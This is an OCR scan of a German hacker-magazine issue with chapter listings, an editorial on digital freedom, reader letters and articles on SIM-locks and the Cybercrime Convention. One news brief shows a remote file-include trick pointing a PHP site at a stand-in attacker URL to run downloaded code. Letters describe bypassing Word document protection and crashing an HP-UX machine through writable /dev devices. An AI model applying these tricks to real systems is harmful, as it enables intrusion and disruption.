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Hamburg 

Lokstedter Weg 72, D-20251 Hamburg, mail- 
to:mail@hamburg.ccc.de.l http://hamburg.ccc.de Prione: +49 
(40) 401 801-0 Fax: +49 (40)401 801 - 41 Voicemailbox +49 
(40) 401801 -31 . Treffen jeden Dienstag ab ca. 20.00 Uhr in den 
Clubräumen. Der jeweils erste Dienstag im Monat ist Chaos- 
Orga-Plenum (intern), an allen anderen Dienstagen ist jede(r) 
Interessierte herzlich willkommen. Öffentliche Workshops im 
Chaos Bildungswerk fast jeden Donnerstag. Termine aktuell un- 
ter http://hamburg. ccc. de/bildungswerk/ 

Köln 

Chaos Computer Club Cologne (c4) e.V. 
Vogelsangerstraße 286 / 50825 Köln 
50°56'45"N, 6°51'02"O (WGS84) 
http://koe/n.ccc.de/Je\. 0221-5463953 
maiito:oeffentiiche-anfragen@koein. ccc. de 
Treffen Dienstags 20:20 



Berlin 

Club Discordia jeden Donnerstag zwischen 17 und 23 Uhr in 
den Clubräumen in der Marienstr. 1 1 , Hinterhof in Berlin-Mitte. 
Nähe U-/S-Friedrichstraße. Tel. (030) 285986-00, Fax. (030) 
285986-56. Briefpost CCC Berlin, Postfach 640236, D-10048 
Berlin. Aktuelle Termine unter http://www.ccc.de/berlin 

Ulm 

Kontaktperson: Frank Kargl <frank.kargl@ulm.ccc.de> 
maiito:mail@ccc. u/m. de I http: //www. u/m. ccc. de/ 
Treffen: Montags ab 19.30h im 'Cafe Einstein' in der Universität 
Ulm. 

Vortrag chaos-seminar: Jeden ersten Montag im Monat im Hör- 
saal 20 an der Universität Ulm. 

Bielefeld 

Kontakt Sven Klose Phone: +49 (521) 1365797, mail- 
to:maii@bielefeld. ccc. de.Jreffen Donnerstags, ab 19.30 Uhr in 
der Gaststätte 'Pinte', Rohrteichstr. 28, beim Landgericht in Bie- 
lefeld. Interessierte sind herzlich eingeladen. 



Chaos-Treffs: 

Aus Platzgründen können wir die Details aller Chaos-Treffs hier 
nicht abdrucken. Es gibt in den folgenden Städten Chaos-Treffs, 
mit Detailinformationen unter http://www.ccc.de/ChaosTr- 
effs.htmt. 

Bochum/Essen, Bremen, Burghausen /Obb. und Umgebung, 
Calw, Dithmarschen/Itzehoe, Dresden, Emden / Ostfriesland, 
Eisenach, Erlangen /Nürnberg/Fürth, Frankfurt a.M., Freiburg, 



Freudenstadt, Giessen/Marburg, Hanau, Hannover, Ingolstadt, 
Karlsruhe, Kassel, Lüneburg, Mannheim /Ludwigshafen/Heidel- 
berg, Mönchengladbach, München, Münster/Rheine/ Coesfeld 
/Greeven/Osnabrück, Rosenheim /Bad Endorf, Neunkirchen/ 
Saarland, Würzburg, Schweiz /Dreyeckland: Basel, Österreich: 
Wien 
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CELEITWORT / INHALTSVERZEICHNIS 



Freiheit, die wir meinen. 



Freiheit ist ein weiter Begriff. Wenn der eine sie fordert, weiß der andere nicht unbedingt, 
welche gemeint ist. Auch Hacker fordern Freiheit. Die Freiheit der Bits zum Beispiel. Aber 
was ist damit bloß gemeint? 



Ein (viel zu) weit verbreitetes Mißverständnis in 
diesem Zusammenhang ist der Glaube, daß es 
Hackern grundsätzlich um Freiheit im Sinne von 
"kostenlos" ginge. Die Forderung nach Wegfall 
von Kopierschutz jeder Art (SDMI, SIM-Locks, 
Region-Code, CSS etc.) wird interpretiert als 
Forderung nach kostenloser Musik, Filmen oder 
billigen Mobilfunktelefonen für alle. Die Forde- 
rung von Andy Müller-Maguhn nach der 
Abschaffung des Urheberrechts z.b. wird nur 
allzu bereitwillig als Aufruf zu Anarchie und 
Niedergang des Kapitalismus stilisiert. Viele ein- 
flußreiche Menschen werden zunehmend ner- 
vös. Und wie reagieren solche Menschen, 
wenn sie nervös sind? Richtig: sie greifen an. 
(Ein bezeichnendes Beispiel dafür liefert der 
Schriftverkehr zum SIM-Lock Artikel auf 
Seite 8). Das haben diese Menschen nun mal 
so gelernt, mit dieser Strategie sind sie dort hin- 
gekommen, wo sie heute stehen. Psycholo- 
gisch gesehen kann man ihnen das also 
garnicht mal verübeln. 



Chaos Realitätsdienst: Kurzmeldungen 2 

Mailto: DS@ccc.de 3 

PrePaid Karten 

Cybercrime Convention 

Politikfnords oder die Realitäten bundesdeut: 

Abgeordneter und Jugendschützer 

Big Brother is listening 1 / 

Spaß mit Nokia - 

Denial of Service Attack für Mobiltelefone 25 

To the Citizens of the 

United States of America, 27 

Messus - Admins Fluch oder Segen? .... 



Das Tragische aber: solange diesen Unterstel- 
lungen nicht wirksam entgegnet wird, werden 
diese Menschen immer die öffentliche Meinung 
auf ihrer Seite haben. (Und die Hacker Applaus 
von der falschen Seite.) 

Die "Freiheit, die wir meinen" ist aber nicht 
(primär) die monetäre. Ich persönlich habe 
nichts dagegen, wenn beispielsweise Warner 
Brothers daran verdient, Hollywood-Kitsch zu 
verkaufen. Aber wenn diese Leute mir vor- 
schreiben wollen, in welchem Land oder mit 
welchem Gerät oder welcher Software ich 
DVDs sehen darf, dann haben sie eine Grenze 
überschritten. Wenn ich dadurch zum Kriminel- 
len werde, daß ich mir einen Player besorge, 
mit dem ich Werbung überspringen kann, dann 
wurde irgendwo unterwegs was ganz wichtiges 
pervertiert. Wenn ich ein käuflich erworbenes 
Mobilfunktelefon nicht so modifizieren darf, 
daß ich damit den Betreiber meiner Wahl errei- 
che, dann sind die wirtschaftlichen Interessen 
von einigen wenigen über die der gesamten 
Verbraucher gestellt. 

Viel schlimmer sind aber die drohenden Kon- 
trollstrukturen, mittels derer die Einhaltung sol- 
che Gesetze durchgesetzt werden soll. Wenn 
Microsoft eines Tages meine eMails abhören 
kann und darf, um sicherzustellen, daß ich 
keine raubkopierte Software einsetze, dann 
habe ich ein wichtiges Stück Freiheit verloren. 
Ganz egal, wie man die benennen mag. 

Tom Lazar <tom@tomster.org> 
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CHAOS REALITÄTSDIENST: KURZMELDUNGEN 



Cagabell 

... oder wieso es besser ist wenn manche Leute 
pleite gehen ... http://php.gigabell.net 
inhalt.php3?bereich=a?menu=b macht ein 
include( n ${bereich}/${menu}-html n ) 
was dann dazu führt dass man "bereich" auch 
auf http://your.server.somewhere/sploits/php3 und 
"menu" auf "iownyou.php3" setzen kann, was 
dann dazu führt dass sie freundlicherweise per 
http den angegebenen PHP3 Code runterladen 
und dann ausführen... Kerblam! <tom> 

Quelle: news@ccc.de 



"Was ist eigentlich... Typo-Traffic?" 

Nunja, der Mensch ist nicht perfekt. Das zeigt 
sich gerade wenn er versucht mit seinem takti- 
len Interface das aus 80-130 rechteckigen ver- 
tikal beweglichen Elementen bestehende 
Interface einer Datenverarbeitungsanlage zu 
bearbeiten. Dies gilt natürlich auch bei der Ein- 
gabe sogenannter URLs. Grundsätzlich schickt 
sein Rechner auch im Falle eines Tippfehlers 
einen DNS-Lookup an den eingetragenen 
Resolver. Wenn dieser nun feststellt, daß die 
angegebene Domain nicht existiert könnte er 
diese Tatsache nun in seinem Logfile vermer- 
ken. 

Das führt dann dazu, daß diese "domain-nicht- 
gefunden"-Logs bei Kapitalisten "für die jeder 
User zählt" Begehrlichkeiten wecken. Das kann 
z.b. so aussehen, daß für eine Liste aller Doma- 
ins, die bei einem grösseren User-Dial-in-ISP in 
den letzten zwei Jahren "mehr als 10 mal" ein- 
gegeben wurden (und bislang nicht existiert) 
schon mal ein siebenstelliger (!) Betrag "Cash 
auf die Hand" geboten wird. Und das ganz 
ohne personenbezogene Daten. Einfach nur 
eine Liste nicht existierender Domains, die ein- 
gegeben wurden, bevorzugt jeweils mit Anzahl 
der Zugriffsversuche. <tom> 



Der Trend geht zur Zweit- Site... 

Whatdo Lucent, Silicon Graphics, Epson, Bor- 
land, NEC, Visa, Nintendo and Nextel have in 
common? They were all victims of web page 
defacement this month, mostly by a group cal- 
ling themselves 'prime suspectz'. The catch? In 
each case, it wasn't the United States based 
web Server, 'prime suspectz' and other defacers 
have recently taken on a pattern of going after 
their slightly lesser known foreign pages. In 
cases like Silicon Graphics, their own machine 
running Irix was compromised, leading to more 
questions about Irix security. Had each of these 
been the primary/US based Server, we no 
doubt would have seen several news articles 
about the events. <tom> 

Quelle: jericho@attrition.org 

Basisdemokatrie, oder was? 

'Stockwell Day' ist nicht etwa die englische 
Bezeichnung für 'Inventurtag', sondern der 
Name des Parteiführers der kanadischen rech- 
ten "Alliance" Partei. Wie aus partei-internen 
Strategiepapieren hervorgeht, würde die kana- 
dische Regierung unter seiner Führung zu jeder 
beliebigen(l) Petition, die mind. 350.000 
Unterschriften sammeln kann, einen Volksent- 
scheid abhalten. Da 350.000 Stimmen immer- 
hin 3% der kanadischen Wahlbevölkerung 
darstellen und die Durchführung eines Volks- 
entscheides gerade mal schlappe $150 Mio. 
kostet, wollte die Sendung "This Hour Has 22 
Minutes" den Schwachsinn dieses Ansinnens 
demonstrieren, indem sie selbst Unterschriften 
zu einer Petition sammelte. Imposant: inner- 
halb von nur 48 Stunden hatte eine (online) 
Petition stolze 228.919 Unterschriften. Die For- 
derung? Stockwell Day müsse seinen Vorna- 
men in Doris ändern. Damit dürfte dieser einem 
Wahlsieg wohl eher mit gemischten Gefühlen 
gegenüberstehen... <tom> 

Quelle: news@ccc.de 



Quelle: seriös 
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Mitgliedschaft 

Hi, mal abgesehen ob ich ein Mitglied zum 
CCC werden will oder nicht: Vielleicht irre ich 
mich, aber ich hab den ChaosComputerClub 
eher in der Region "Hacker" angesiedelt. Nun 
hab ich die Anmeldesite entdeckt, incl. den 
Gebühren, was mich dann doch etwas merk- 
würdig gestimmt hat. Eine Vereinigung von 
"mehr-als-nur-high-tech-interessierten Cracks" 
nimmt (gegen Gebühr?) absolut jeden auf? 
Sorry, aber irgendwie verstehe ich das nicht, 
auf eurer HP steht irgendwo, dass ca. 40 (kann 
mich auch irren) Leute dieses Mail lesen wer- 
den, wenn nun aber jeder sich beim CCC 
anmelden kann, warum sind das nur so 
wenige? Versteht ihr mein "Verständnispro- 
blem"? MfG, HReaper! 

Hat Dich Deine Mutter wirklich so genannt? Du 
Ärmster. . Warum sollten wir nicht jeden aufneh- 
men? Wer interessiert daran ist, dem CCC beizu- 
treten und damit seine Arbeit zu unterstützen, 
den werden wir nicht so schnell abweisen - 
warum auch? Die Mitgliedschaft an sich bedeu- 
tet ja "nur", daß Du Mitglied im CCC bist, daß Du 
die Datenschleuder bekommst und daß Du bei 
Mitgliederversammlungen dabei sein kannst 
und dort ein Stimmrecht hast, mehr nicht. 

PS: noch ne kleine Frage: was hat man denn 
konkret davon, wenn man bei euch Mitglied 
ist? (bitte nicht falsch verstehen) 

Das kommt darauf an. Halt die Da tenschleuder. 
Dann Stimmrecht bei Versammlungen. Wer aktiv 
ist (zB bei den Treffs, beim Communication Con- 
gress oder wo auch immer) wird natürlich auch 
wahrgenommen und kann dann bei weiteren 
Aktivitaeten helfen. Sprich: Mitglied sein heisst 
nicht viel. Aktiv sein bedeutet viel mehr. Mit- 
gliedsein heisst nicht "Ich bin jetzt Mitglied und 
kann fordern und bekommen "sondern "Ich 
stimme den Prinzipien des CCCs zu und will 
dabei helfen sie umzusetzen ". Eigeninitiative ist 
sehr gefragt. (Hanno) 



Security alä Microsoft 

Hallo Leute, 

ich denke Ihre wisst das zwar schon, aber den 
Microsoft Word Dokumentenschutz kann man 
ganz einfach umgehen ( sogar wie in meinem 
Fall unter Beibehaltung von kyrillischer Schrift). 

Man muß das geschützte Dokument als rtf- 
Datei abspeichern und kann das rtf-Dokument 
mit Star-Office dann ändern. Dann speichert 
man das geänderte Dokument wieder unter 
StarOffice im rtf-Format ab. Das nun mit StarOf- 
fice abgespeicherte Dokument kann man in 
Word ganz normal öffnen. 

Ich habe das mit dem Visumsantrag für Weiß- 
russland von www.visaexpress.de gemacht. Es 
gehen nur ein paar Tabellenformatierungen 
kaputt (Zellen verbinden) aber das geht schnell 
wieder herzustellen. Man sollte deswegen das 
geschützte Dokument im Orginal einmal aus- 
drucken, um die Formatierungen nachher zu 
vergleichen. 

Viele Grüße, Daniel Neumann 

Sehr bezeichnend. Ein weiteres Beispiel dafür, 
für wie dumm Microsoft seine User eigentlich 
hält. Anders als im Fall der penetranten "Office- 
Assistenten " ( wie beispielsweise der affigen 
"sprechenden Büroklammer", die dem User 
Debilität unterstellt) wird dem User hier vorge- 
täuscht, daß er/sie Dokumente sicher schützen 
könne — obwohl dieser "Schutz" mit simplen 
Methoden umgangen werden kann und deshalb 
garkeiner ist. Wahrscheinlich geht Microsoft 
da von aus, daß ihre User sowieso keine wichti- 
gen und deshalb schützenswerten Dokumente 
bearbeiten, (tom) 
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Cookies — nicht nur zu Weihnachten... 

Meine Frage: Vor kurzem habe ich erst erfah- 
ren, daß gewerbliche Webpages oft "Cookies" 
abfragen und somit mein komplettes "surf- 
Verhalten" ablesen können. Gibt es irgend ein 
Programm mit dem ich sozusagen "fake-coo- 
kies" senden kann. Ich mag es nicht, überall als 
"gläserner" Verbraucher benutzt zu werden. 

Cookies dienen dazu, einen Webseitenbesucher 
wiedererkennen zu können. Dies ist z.B. dann 
wichtig, wenn man Warenkörbe auf einer eCom- 
merce-Seite anbieten will. Warenkörbe und Nut- 
zer müssen dann natürlich zusammenpassen. 
Dies kann man z.B. durch Cookies sicherstellen. 
Ich erwähne dies, weil Cookies an sich nicht 
"böse " sind. Allerdings werden die Cookies von 
Web-Marke tingfirmen auch gerne zur langfri- 
sten Wiedererkennung von Webbenutzern über 
mehrere Webseiten hinweg benutzt. Auf diese 
Art und Weise lassen sie sich hervorragend zur 
Profilerstellung einsetzen. Füllt man dann 
irgendwo nochmal ein Formular aus, kann dieses 
Profil unter Umständen konkret einer Person 
(nämlich Dir) zugeordnet werden. Cookies ent- 
halten meistens eine Benutzer-ID. Du kannst 
natürlich einfach diese ID in den Cookies verän- 
dern, wenn Du möchtest. Wo die Cookies gespei- 
chert werden, hängt vom eingesetzten Browser 
ab. Netscape benutzt dazu die Datei "Cookies", 
der Internet Explorer ein eigenes Verzeichnis. 
Natürlich kannst Du die Cookies auch bei jedem 
Reboot oder zeitgesteuert regelmäßig löschen. 
Die meisten Browser bieten auch eine Option an, 
mit der Cookies generell abgelehnt werden. 
Dann werden aber auch die Cookies von Websei- 
ten abgelehnt, die darauf angewiesen sind. 
Manche Webseiten funktionieren dann unter 
Umständen nicht mehr richtig. Ich 'persönlich* 
bevorzuge folgende lösung: Cookies enthalten 
ein Verfallsdatum. Durch ein spezielles Pro- 
gramm, welches als "Proxy" zwischen Browser 
und Web fungiert, setzte ich dieses Verfallsda- 
tum automatisch auf 24 Stunden. Damit kann ich 



alle Webseiten problemlos benutzen, ein evtl. 
ers teilt es Profil kann aber maximal über einen 
lag gehen. Ein solches Programm ist z.B. der 
kostenlose Internet-Junkbuster (www.junkbu- 
ster. com). Siemens bietet ein kommerzielles Pro- 
dukt names WebWasher an, welches für den 
privaten Einsatz auch kostenlos ist (www. web- 
washer.com). Bitte beachte, daß diese Hinweise 
keine Empfehlung darstellen. Es gib t na türlich 
auch noch viele andere Programme dieser Art. 
Die Suchmaschine deiner Wahl hilft da weiter. 

Die Online-Profilerstellung ist na türlich noch 
viel komplexer, als hier dargestellt. Wenn Du 
mehr darüber wissen möchtest, besuche doch 
mal die Webseiten der Datenschutzbeauftragen 
oder bemühe eine Suchmaschine. (Sebastian) 



Gesucht: Spam relay 

Guten tag und hallo, ich hoffe dass ihr mir wei- 
terhelfen könnt. Ich suche einten] mail Server, 
von dem man ohne login eine mail verschicken 
[kann, ] ohne [dass] die[ser] die [eigene] IP 
Adress [e] kontrollieren [kann]. ("Aaaargh!" 
Anm. d. Red.) 

Veröffentliche deine Adresse an prominenter 
Stelle im Usenet. Dann kriegst du massig Spam 
zugeschickt. Analysiere deren Header. Die Kisten 
von wo der Spam herkomm t sind meist solche 
offenen Rela ys. Dass die en tweder nich t lang 
offen sind oder von ueberall geblockt werden, 
liegt in der Natur der Sache, (dollinger) 



Erst hacken, dann fliegen? 

Ich bin Auszubildender zum Fachinformatiker 
(Anwendungstechnik) am b.i.b. Paderborn. 
Jemand von uns hat durch Zufall entdeckt, wie 
die dortige HP-UX den Dienst quittiert. Nach- 
dem er nach dreimaligem Test sicher war dass 
er es war, hat er dummerweise Klassenkamera- 
den erzählt wie es geht. 
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Dass die meisten Devices unter /dev schreibbe- 
rechtigt für alle sind, verbreitete sich wie ein 
Lauffeuer. Zwei kamen noch dazu es auszupro- 
bieren. Und genau die sitzen jetzt in der 
Klemme. Sie haben RZ-Verbot und es wird zur 
Zeit diskutiert, ob sie von der Schule fliegen. 

Die Arbeitgeber werden informiert und ihre 
Ausbildung ist in Gefahr. Wie ist die Rechts- 
lage? 

Gilt die Metapher: " Ich hab auch ein Messer in 
der Küche. Das heisst aber nicht, dass ich damit 
jemanden verletze." oder "Kindern, die Laufen 
lernen, sollten kein Messer in den Weg gelegt 
bekommen." Gruß, Holger ßartnick 

Zur Rechtslage kann ich dir nichts verbindliches 
sagen. Dafür gibt es Anwälte. Es ist natürlich 
nicht die beste Vorgehensweise, das Teil gleich 
mehrmals zu schroten und es unter den "Kame- 
raden "zu verbreiten, die dann auch wie die 
kleinen Kinder das auch machen. Klüger wäre es 
gewesen, denAdmin der Kiste mal darauf hinzu- 
weisen. 

Kurz - die sind selber schuld und gerade in eurer 
A usbildung solltet ihr in der Beziehung ein 
wenig sensibler sein . . . 

Aber jemanden deswegen von der Schule zu 
schmeissen finde ich schon ein wenig hart. Eher 
sollten sie mal darueber nachdenken den Sysad- 
min zu entlassen. Meiner Meinung nach, (jörn) 



Security alä Sparkasse 

Hi, mir ist bei der Zusammenarbeit mit der 
Sparkasse in Darmstadt etwas aufgefallen, das 
ihr vielleicht weiterverwenden könnt: Um zu 



verhindern, daß via Online-Überweisung grö- 
ßere Geldmengen von einem evtl. gehackten 
Konto weggeschafft werden können, kann 
man bei der Einrichtung des Onlinekontos 
Höchstgrenzen der zulässigen Überweisungs- 
beträge festlegen, z.B. 500,- pro Tag und Auf- 
trag. Dieser Sicherheitsmechanismus ist keiner: 
Ein Telefonanruf bei der Sparkasse und die 
Durchgabe der entsprechenden Kontonummer 
genügen, um die Betragsgrenze beliebig zu 
erhöhen oder ganz abzustellen. Hat jemand 
Zugriff auf das Konto, sind die 20 000 dann 
eben doch mit einem Schlag weg. Dem Kunden 
wird suggeriert, mehr als z.B. 500,- könnten 
durch die Grenze sowieso nicht wegkommen. 
Soviel dazu. Gruß, NilS 

Und hinterher heißt es dann, die Sparkasse sei 
das Opfer gemeingefährlicher Hacker gewor- 
den... (tom) 



Ohne Browser geht nunmal nichts... 

Nicht, dass es einen besonders verwundert 
hätte, aber dieser Beipackzettel zur Sony 
Cybershot 505 (s.u.) fällt auf. 

Das angesprochene Stück Software (Picture 
Gear) holt nur Bilder über die serielle Schnitt- 
stelle von der Kamera und zeigt sie an. Und 
das auch noch langsam und schlecht. Im gan- 
zen nichts, was den IE5 ansatzweise rechtferti- 
gen könnte. Und auch nur hebraeisch... Ein 
Test in deutsch klappte sogar ganz ohne Win- 
dows... Mit reinem DOS und serieller Schnitt- 
stelle. Hans 

Achja, wißt ihr noch? Früher? Als man noch 
Hardware benutzte, um Software zu verdongeln, 
anstatt umgekehrt?! (tom) 



For Windows 1 98 Hebrew customers 

Please install Internet Explorer®5.0 before installir 



; PictureGear Lite. 



Ii you install PictureGear Lite without Internet Explorer®5.0 in your PC, your PC 
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BITVERTEUERUNC AKTUELL: SIM-LOCKS 



PrePaid Karten 

von Frank Rosengart 



Wettrennen um Handysperre endet vor Cericht 



Die deutschen Mobilfunkunternehmen haben 
für die UMTS-Lizenzen immense Summen auf- 
wenden müssen, die sie aber nicht allein auf- 
bringen konnten, sondern sich von Banken 
leihen mussten. Die kreditgebenen Banken 
möchten jedoch gern wissen, wie der Kredit- 
nehmer im Markt steht. Auch für anstehende 
Fusionsverhandlungen und Börsenkurse sind 
bestimmte Messwerte interessant. 

Zwei Messwerte sind die Kosten für die Gewin- 
nung eines Neukunden und die Anzahl der 
Neukunden. Um diese Zahlen besonders gut 
dastehen zu lassen, haben die Mobilfunkanbie- 
ter sogenannte PrePaid-Karten eingeführt. Bei 
diesen Karten braucht der Kunde keinen Ver- 
trag abzuschließen und kann die anfallenden 
Kosten sehr gut kontrollieren, da immer nur ein 
aufgeladenes Guthaben abtelefoniert werden 
kann. Daher sind wohl Jugendliche die Haupt- 
zielgruppe. 

Um die Telefone noch schmackhafter zu 
machen und damit die Zahl der Neukunden (als 
Kunde zählen auch PrePaid Karten) zu steigern, 
bieten die Mobilfunkanbieteer subventionierte 
Telefone an. Sie hoffen, dass der PrePaid Kunde 
in den nächsten Monaten diese Subvention 
durch hohe Minutenpreise wieder einbringt. 
Damit aber die "billigen" Telefone nicht mit 
Karten der Konkurrenz oder preiswerteren 
"normalen" Mobiltelefonkarten benutzt wer- 
den können, ist die Software des Mobiltelefons 
mit einer sogenannten "SIM-Lock" Sperre ver- 
sehen. 



Dies bedeutet, daß das Telefon nur mit der ent- 
sprechenden PrePaid-Karte funktioniert. Der 
SIM-Lock Mechanismus bewirkt, daß das Tele- 
fon für andere Teilnehmerkarten nicht zu 
benutzen ist. Findige Elektronikbastler nehmen 
seid geraumer Zeit diese gesperrten Telefone 
und deren Software genau unter die Lupe und 
haben für alle gängigen Modelle Lösungen 
gefunden, diese Sperre zu beseitigen. Mit 
selbstgelöteten Kabeln und meist eigens pro- 
grammierter Software können die meisten die- 
ser Sperren entfernt werden. Das Telefon 
arbeitet dann ganz gewöhnlich mit jeder Karte 
zusammen und unterscheidet sich auch sonst 
durch nichts - außer im günstigen Gerätepreis. 
Diese Tatsache haben windige Geschäfte- 
macher erkannt und und kaufen massenweise 
SIM-Lock Telefone, entsperren sie und verkau- 
fen sie mit Gewinn weiter. Oft gehen die 
Geräte ins Ausland. Da dieser Handel mittler- 
weile eine beachtliche Größenordnung erreicht 
hat, werden Software und Hilfsmittel zur Ent- 
sperrung im Internet für über 1000 DM ange- 
boten. Es gab sogar Händler, die diesen Service 
gegen Entgelt angeboten haben. 

Wer ist schneller? 

Da die Mobilfunkanbieter diese erheblichen 
Verluste nicht weiter hinnehmen können, set- 
zen sie die Telefonhersteller unter Druck, die 
Sicherungen noch ausgefeilter und schwerer 
knackbar zu machen. Es ist allerdings nur eine 
Frage der Zeit, bis auch die neueste Variante 
wieder geknackt wird. Das Wissen über die 
Entfernung des SIM-Lock wird selten als 
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öffentliches Gut ins Netz gestellt. Häufig wird 
es gegen viel Geld verkauft. Immerhin müssen 
die neuesten Handymodelle und aufwendiges 
Laborgerät bezahlt werden. Um dieser Ver- 
schiebung des Geldes vom Mobilfunkanbieter 
weg zu diesem grauen Markt Einhalt zu gebie- 
ten, mahnen die Mobilfunkbetreiber die Anbie- 
ter von Hilfsmitteln zur Entfernung des SIM- 
Locks ab und zwingen diese zur Entfernung 
ihres Internetangebotes. Häufig wird mit 
erheblichen Gebühren durch entsprechende 
Streitwerte im Millionenbereich gedroht. 

Dabei ist die Rechtslage nicht ganz eindeutig: 
Der gewerbliche Vertrieb von Freischalt-Werk- 
zeugen wird mit einem Verstoß gegen das 
Wettbewerbsrecht belegt. Hier steht eine rich- 
terliche Entscheidung aus. Relativ wenig Hand- 
habe haben die Mobilfunkanbieter gegen das 
reine Veröffentlichen von Informationen zur 
Entsperrung. Die Gewinnung von Informatio- 
nen zur Entsperrung (Reengineering) ist in 
Deutschland derzeit nicht strafbar. Auch eine 
Preisgabe dieser Tipps und Bauanleitungen 
steht nicht im Zusammenhang mit den Wettbe- 
werbsverstößen. 

Anlässlich eines derzeit schwelenden juristi- 
schen Konfliktes, in dem ein in München ansäs- 
siges Mobilfunkunternehmen sowie ein 
ebenfalls in München ansässiges namhaftes 
Elektronikunternehmen gegen die Betreiber 
einer Website Klage anstrebt, der über entspre- 
chende Anbieter von Freischalt-Werkzeugen 
und die Methodik mit entsprechenden Links 
berichtet hatten, stellt sich allerdings die Frage 
der Informationsfreiheit. 

Der Chaos Computer Club weist darauf hin, 
dass die Kriminalisierung der Erarbeitung von 
technischen Informationen (Reengineering) 
und die Verbreitung dieser Informationen 
(selbst oder über Links) zur Folge haben würde, 
dass die Preise für die Informationen und 
Dienstleistungen zur Entsperrung weiter stei- 



gen, die Szene weiter in die Dunkelheit rückt 
und sich die mafia-artigen Strukturen verfesti- 
gen. Abgesehen von der bislang unbeantwor- 
teten Frage, ob der Käufers des Telefons damit 
nicht schlicht machen kann, was er will, kann 
die Untersuchung und Veränderung der Soft- 
ware eines Telefons dem Benutzer durchaus 
Vorteile bringen. 

So lässt sich - ähnlich wie bei einem Computer 
- das Leistungsspektrum des Telefons erwei- 
tern. Bei einem Handy-Modell konnte mit der 
veränderten Software beispielsweise die 
Taschenrechnerfunktion wieder benutzt wer- 
den, die der Hersteller bei dieser Baureihe 
deaktiviert hatte. Eine Konvention des Europa- 
rat zur Bekämpfung der "Internetkriminalität" 
(Cybercrime) sieht vor, dass die unterzeichnen- 
den Länder Gesetze erlassen, die die Verbrei- 
tung von "Hackertools" unter Strafe stellen. 
Darunter würden auch die oben erwähnten 
Entsperrprogramme fallen. Der Entwurf dieser 
Kommision wird derzeit von verschiedenen 
Gremien bearbeitet. 

Mirror des vor dem LG München schwelenden 
Verfahrens [1] .Cybercrime-Convention des 
Europarats [2]. 



[1] http://www.ccc.de/BSE/ 

[2] http://conventions.coe.int/treaty/EN/projets/ 

cybercrime24.doc 
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Cybercrime Convention 

von Frank Rosengart 



Seit 1997 kursiert ein weiteres Schreckgespenst hinsichtlich der Einschränkung von Bürger- 
rechten. Der Europarat erarbeitet eine Konvention, nach der sich die Mitgliedsstaaten zur 
Mindeststandards bei der Strafverfolgung von Taten in Zusammenhang mit Computern 
und Kommunikationsmitteln ("Cybercrime") verpflichten. 



Wie auch schon bei den Enfopol-Plänen waren 
massive Nachforschungen seitens Bürgerrecht- 
lern und Presse nötig, bis der Entwurf öffentlich 
wurde. 

Aus dem Justizministerium heißt es, die Kon- 
vention soll vor allem Rechtssicherheit im Inter- 
net schaffen. Die schafft es auch, nämlich für 
Justiz und Polizeibehörden. Aber auch für Fir- 
men, die mangelhafte Sicherheit in ihren Pro- 
dukten und Dienstleistungen implementiert 
haben. Die Cybercrime-Konvention erlaubtes 
den Firmen, eine zu detaillierte Veröffentli- 
chung der Sicherheitsprobleme strafrechtlich 
verfolgen zu lassen. Auch der konkrete Nach- 
weis von Sicherheitslücken wird extrem 
erschwert, da die Mitgliedsstaaten Gesetze 
erlassen müssen, die die Erstellung von "Hak- 
kertools" unter Strafe stellen. Das Justizmini- 
sterium betont dabei, dass "dual-use" 
Anwendungen nicht dadurch erfasst werden. 
Jedoch steht im Draft 24 der Konvention, dass 
Programme, die "primarily" für den kriminellen 
Gebrauch bestimmt sind, verboten werden 
müssen. Das widerspricht eindeutig der Idee, 
dass nützliche Tools erlaubt bleiben. 

Einige der Punkte der Konvention werden 
bereits durch das deutsche Recht abgedeckt, 
wie zum Beispiel das "Ausspähen von Daten". 
Hier fehlt jedoch ein Hinweis darauf, dass die 
Daten eindeutig als nichtöffentlich gekenn- 
zeichnet sein müssen und einem besonderen 



Schutz unterliegen. So kann also die harmlose 
Benutzung eines FTP-Servers bereits verfolgt 
werden, wenn der Betreiber die Daten (im 
Nachhinein) als nichtöffentlich bezeichnet. Dies 
wird zwar in einer Fußnote eingeschränkt, 
jedoch unterliegen Fußnoten üblicherweise 
auch einer gewissen Fluktation, so dass jeder 
neue Entwurf dieser Konvention entsprechend 
kritisch und sorgsam begutachtet werden muss. 

Viel Spielraum für Interpretation lässt der 
Begriff "on a commercial scale", der als Maß- 
stab strafbare Urheberrechtsverletzungen im 
Sinne der WIPO-Abkommen gilt. Damit scheint 
das speziell deutsche Recht auf private Kopien 
zumindest nicht angetastet. 

Für Datenschützer haarsträubend ist der zweite 
Abschnitt der Konvention, der sich mit dem 
Erhebung von Verkehrs- und Inhaltsdaten in 
Echtzeit beschäftigt. Damit scheint die Ver- 
pflichtung zur Implementierung von LI (Lawful 
Interception) eindeutig besiegelt und auch die 
Verpflichtung der Provider, als rechte Hand der 
Strafverfolgungsbehörden zu agieren und sich 
um die Erhebung und Sicherung der Beweisda- 
ten zum kümmern. Bedenken, dass versteckt 
ein Key Recovery gefordert wird, sind nicht 
bestätigt. Den Providern bleibt es frei, die ent- 
schlüsselten Daten den Behörden zu übergeben 
- oder besser, gar nicht erst Nutzungsdaten zu 
erheben. Provider sind nur gezwungen, Daten 
herauszugeben, die sie auch haben. Allerdings 
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können trotzdem nationale Gesetze die Provider zur Erhebung und Aufbewahrung von Daten zwin- 
gen. Das Justizministerium betont, dass die Daten immer nur im Rahmen eines Rechtshilfeersuchen 
zur Verfügung gestellt werden müssen. Dank EuroPol steht aber der ungehinderten Reise der Daten 
nichts mehr im Wege. Die Datenreise könnte also bald zu einem strafrechtlichen Horrortrip werden. 

Das Dokument wird jetzt im Dezember in die vorerst letzte Runde gebracht und ist in der Fassung 
24 im Netz zu finden. Zwischendurch war mal der Draft 19 öffentlich geworden. Zwischenversionen 
hält die Kommission aus Rücksicht auf "diplomatische Empfindlichkeiten" zurück. Erst wenn das 
Abkommen ratifiziert wurde, wird sich zeigen, wie die Staaten die einzelnen Paragrafen interpretie- 
ren und in nationales Recht umsetzen. Holland hat immerhin schon einen Anfang gemacht und will 
schon vor der Ratifizierung seine Gesetze entsprechend anpassen. 
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Politikfnords oder 

die Realitäten bundesdeutscher 

Abgeordneter und Tugendschützer 

von Jadis 



Daß wir alle in verschiedenen Realitäten leben und jeder seine eigene Wirklichkeit (TM) 
konstruiert, sollte seit längerem bekannt sein. So leben auch Politiker in ihrer eigenen, 
kleinen Realität und dies durfte ich bei einer Einladung als Sachverständige für den CCC 
bei einer öffentlichen Anhörung des Bundestages bestaunen. 



